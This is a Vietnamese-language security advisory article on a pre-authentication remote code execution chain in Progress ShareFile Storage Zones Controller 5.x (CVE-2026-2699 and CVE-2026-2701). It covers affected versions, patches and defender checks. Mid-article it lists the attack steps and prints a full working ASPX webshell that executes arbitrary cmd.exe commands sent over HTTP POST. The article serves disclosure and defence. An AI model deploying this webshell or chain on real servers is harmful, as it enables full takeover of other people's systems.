Lỗ hổng CVE nghiêm trọng trong Progress ShareFile: RCE khẩn cấp!
Một chuỗi tấn công nguy hiểm đã được phát hiện trong hệ thống Progress ShareFile, cho phép các tác nhân đe dọa chiếm quyền điều khiển các máy chủ triển khai tại chỗ mà không cần xác thực trước. Sự cố này đặt ra một rủi ro bảo mật nghiêm trọng đối với các tổ chức sử dụng giải pháp này.
Các lỗ hổng ảnh hưởng đến các triển khai ShareFile Storage Zones Controller 5.x do khách hàng tự quản lý. Progress đã khuyến nghị khách hàng nâng cấp lên phiên bản 5.12.4 hoặc chuyển sang bất kỳ phiên bản 6.x nào, vốn không bị ảnh hưởng.
Hai lỗ hổng chính tạo nên chuỗi tấn công này đã được xác định và cấp mã CVE:
CVE-2026-2699: Lỗ hổng Bỏ qua Xác thực (Authentication Bypass)
Lỗ hổng đầu tiên, được đánh giá CVSS 9.8 (Nghiêm trọng), là một lỗi bỏ qua xác thực. Lỗi này cho phép truy cập vào các trang cấu hình bị hạn chế mà không cần thông tin đăng nhập hợp lệ.
Theo phân tích của WatchTowr, nguyên nhân của lỗ hổng là do điều kiện Execution After Redirect trên trang cấu hình Admin.aspx. Mặc dù ứng dụng gửi phản hồi HTTP 302 Redirect đến trang đăng nhập, logic của trang vẫn tiếp tục thực thi. Điều này vô tình để lộ các chức năng quản trị cho người dùng chưa được xác thực.
Hành vi này liên quan đến cách ứng dụng sử dụng một hàm chuyển hướng không dừng quá trình thực thi một cách chính xác. Kẻ tấn công có thể lợi dụng điều này để vượt qua cơ chế xác thực ban đầu.
CVE-2026-2701: Lỗ hổng Thực thi Mã từ Xa (Remote Code Execution)
Lỗ hổng thứ hai, được đánh giá CVSS 9.1 (Nghiêm trọng), cho phép remote code execution thông qua việc tải lên và thực thi các tệp độc hại. Lỗ hổng này trở nên đặc biệt nguy hiểm khi kết hợp với khả năng bỏ qua xác thực.
Sau khi truy cập được vào giao diện quản trị nhờ lỗ hổng CVE-2026-2699, kẻ tấn công có thể sửa đổi các cài đặt vùng quan trọng, bao gồm đường dẫn lưu trữ và các giá trị liên quan đến mật khẩu.
Khả năng truy cập này trở nên nghiêm trọng hơn khi CVE-2026-2701 cho phép tải lên và giải nén một tệp lưu trữ độc hại vào một đường dẫn do máy chủ kiểm soát, bao gồm cả một thư mục có thể truy cập qua web.
Chuỗi Tấn công và Khai thác Thực tế
Chuỗi tấn công được trình diễn cho thấy kẻ tấn công có thể thực hiện các bước sau để đạt được quyền remote code execution hoàn chỉnh:
- Bỏ qua xác thực: Sử dụng lỗ hổng CVE-2026-2699 để truy cập trái phép vào trang quản trị Admin.aspx.
- Truy cập giao diện quản trị: Kẻ tấn công có được quyền điều khiển các chức năng quản trị, cho phép thay đổi cấu hình hệ thống.
- Sửa đổi cài đặt vùng: Thực hiện các thay đổi đối với đường dẫn lưu trữ và các thông số nhạy cảm khác.
- Tải lên tệp độc hại: Lợi dụng lỗ hổng CVE-2026-2701, kẻ tấn công tải lên một tệp lưu trữ chứa mã độc (ví dụ: một ASPX webshell).
- Giải nén và đặt webshell: Tệp độc hại được giải nén vào một thư mục có thể truy cập qua web của ShareFile webroot.
- Thực thi mã từ xa: Kẻ tấn công truy cập webshell qua web để thực thi mã tùy ý trên máy chủ, dẫn đến chiếm quyền điều khiển hoàn toàn hệ thống.
Một ví dụ về webshell ASPX được sử dụng trong kịch bản này có thể tương tự như sau:
<%@ Page Language="C#" Debug="true" EnableSessionState="false" %><%@ Import Namespace="System.IO" %><%@ Import Namespace="System.Reflection" %><%@ Import Namespace="System.Diagnostics" %><html><body><form method="POST" action="" enctype="multipart/form-data"> <input type="text" name="cmd" value="" size="80" /> <input type="submit" value="Execute" /></form><pre><% if (Request["cmd"] != null && Request["cmd"] != "") { ProcessStartInfo psi = new ProcessStartInfo("cmd.exe"); psi.Arguments = "/c " + Request["cmd"]; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); Response.Write(p.StandardOutput.ReadToEnd());} %></pre></body></html>Đoạn mã trên minh họa một webshell cơ bản cho phép thực thi lệnh hệ thống thông qua tham số cmd trong yêu cầu HTTP POST.
Mức độ Nghiêm trọng và Rủi ro Bảo mật
Mặc dù Progress cho biết chưa ghi nhận báo cáo về việc khai thác tích cực các lỗ hổng này tại thời điểm công bố, nhưng các nhà cung cấp đã phân loại đây là các vấn đề nghiêm trọng. Cảnh báo này nhấn mạnh mối đe dọa mạng tiềm tàng đối với các tổ chức.
Mục tiêu tấn công là ShareFile Storage Zones Controller, một thành phần triển khai tại chỗ cho phép các tổ chức lưu trữ tệp trong hạ tầng riêng của họ trong khi vẫn sử dụng giao diện quản lý dựa trên đám mây của ShareFile. Thiết kế này thường được các doanh nghiệp có yêu cầu tuân thủ, chủ quyền dữ liệu hoặc bảo mật nội bộ sử dụng.
Ước tính có khoảng 30.000 phiên bản Storage Zone Controller đang hướng ra internet, theo WatchTowr. Do các máy chủ này nằm ở rìa của quy trình chia sẻ tệp, chúng trở thành mục tiêu đặc biệt hấp dẫn cho các nhóm mã độc tống tiền (ransomware) và các tác nhân đe dọa khác, gia tăng nguy cơ bảo mật cho dữ liệu nhạy cảm.
Biện pháp Khắc phục và Cập nhật Bản vá
Để bảo vệ hệ thống khỏi chuỗi tấn công này, các tổ chức cần thực hiện các hành động khẩn cấp. Progress đã phát hành các bản vá lỗi vào ngày 2 tháng 4 năm 2026.
Lộ trình phát triển và sửa lỗi cho thấy các lỗ hổng đã được tiết lộ riêng tư vào tháng 2, được Progress xác nhận vào giữa tháng 2 và đã được khắc phục trong ShareFile Storage Zones Controller 5.12.4 vào ngày 10 tháng 3, trước khi công bố rộng rãi vào tháng 4. Để tìm hiểu thêm về phân tích chi tiết, bạn có thể tham khảo bài viết của WatchTowr: You're Not Supposed To ShareFile With Everyone: Progress ShareFile Pre-Auth RCE Chain (CVE-2026-2699 & CVE-2026-2701).
Đối với các nhà phòng thủ, ưu tiên hàng đầu là:
- Xác định hệ thống bị ảnh hưởng: Tìm kiếm bất kỳ hệ thống ShareFile Storage Zones Controller 5.x nào đang hướng ra internet.
- Cập nhật bản vá ngay lập tức: Nâng cấp lên phiên bản 5.12.4 hoặc bất kỳ bản phát hành 6.x nào để áp dụng các bản vá bảo mật.
- Kiểm tra thay đổi cấu hình: Rà soát các thay đổi cấu hình đáng ngờ.
- Kiểm tra tệp không mong muốn: Tìm kiếm các tệp lạ hoặc không mong muốn trong các thư mục có thể truy cập qua web.
Các hành động này giúp giảm thiểu rủi ro an toàn thông tin và bảo vệ hệ thống khỏi các cuộc tấn công mạng tiềm tàng khai thác các lỗ hổng CVE này.
